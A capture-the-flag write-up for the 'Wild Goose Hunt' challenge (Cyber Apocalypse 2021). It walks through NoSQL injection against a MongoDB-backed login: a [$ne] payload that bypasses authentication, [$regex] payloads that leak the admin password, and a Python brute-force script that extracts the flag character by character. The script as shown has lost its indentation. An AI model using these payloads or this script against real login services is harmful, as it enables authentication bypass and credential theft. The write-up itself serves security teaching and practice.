Wild Goose Hunt Writeup
Cyber Apocalypse 2021
Solved by : thewhiteh4t
- We have a cool login page and source of the web app for this one
- entrypoint.sh contains the following :
#!/bin/ash
# Secure entrypoint
chmod 600 /entrypoint.sh
mkdir /tmp/mongodb
mongod --noauth --dbpath /tmp/mongodb/ &
sleep 2
mongo heros --eval "db.createCollection('users')"
mongo heros --eval 'db.users.insert( { username: "admin", password: "CHTB{f4k3_fl4g_f0r_t3st1ng}"} )'
/usr/bin/supervisord -c /etc/supervisord.conf
- we can see that the flag is being stored as the password of admin
- we need to somehow extract the password
- since its mongoDB first assumption was to check for NoSQL injection
- Here is the error message we get in burp for a normal attempt
- Lets switch to repeater here
- so we are getting a json response and the message is being displayed in the frontend
- next i tried some basic payloads for NoSQL injection
username[$ne]=lol&password[$ne]=lol
- Authentication bypassed! but we dont get any functionality in the frontend so i proceeded with more payloads
username=admin&password[$regex]=A*
- This is an interesting payload because we can use a wildcard to check if a particular character is present in the password or not!
- we know that the flag is the password and flag begins with
CHTB{
so I tried that next
username=admin&password[$regex]=CHTB{.*
- And it works again!
- Now we can bruteforce characters and check for success message to get correct characters
- I created a small python script for it
#!/usr/bin/env python3
#################################
## Author : thewhiteh4t ######
## Challenge : Wild Goose Hunt ##
#################################
import json
import requests
ip = '138.68.187.25'
port = 31370
url = f'http://{ip}:{port}/api/login'
flag = 'CHTB{'
charset = '_01234abcdefghijklmnopqrstuvwxyz'
loop_iter = 1
while flag.endswith('}') == False:
for char in charset:
if loop_iter == 1:
payload = flag + char + '.*'
else:
payload = flag + '}'
data = {
'username': 'admin',
'password[$regex]': payload
}
try:
rqst = requests.post(url, data=data)
except Exception as e:
print(f'[-] Exception : {e}')
exit()
if rqst.status_code == 200:
resp = rqst.text
json_resp = json.loads(resp)
status = json_resp['logged']
if status == 1:
if payload.endswith('}') == False:
flag = payload.replace('.*', '')
else:
flag = payload
print(f'FLAG : {flag}')
exit()
print(f'FLAG : {flag}')
loop_iter = 0
break
else:
print(f'[-] Error : {rqst.status_code}')
loop_iter += 1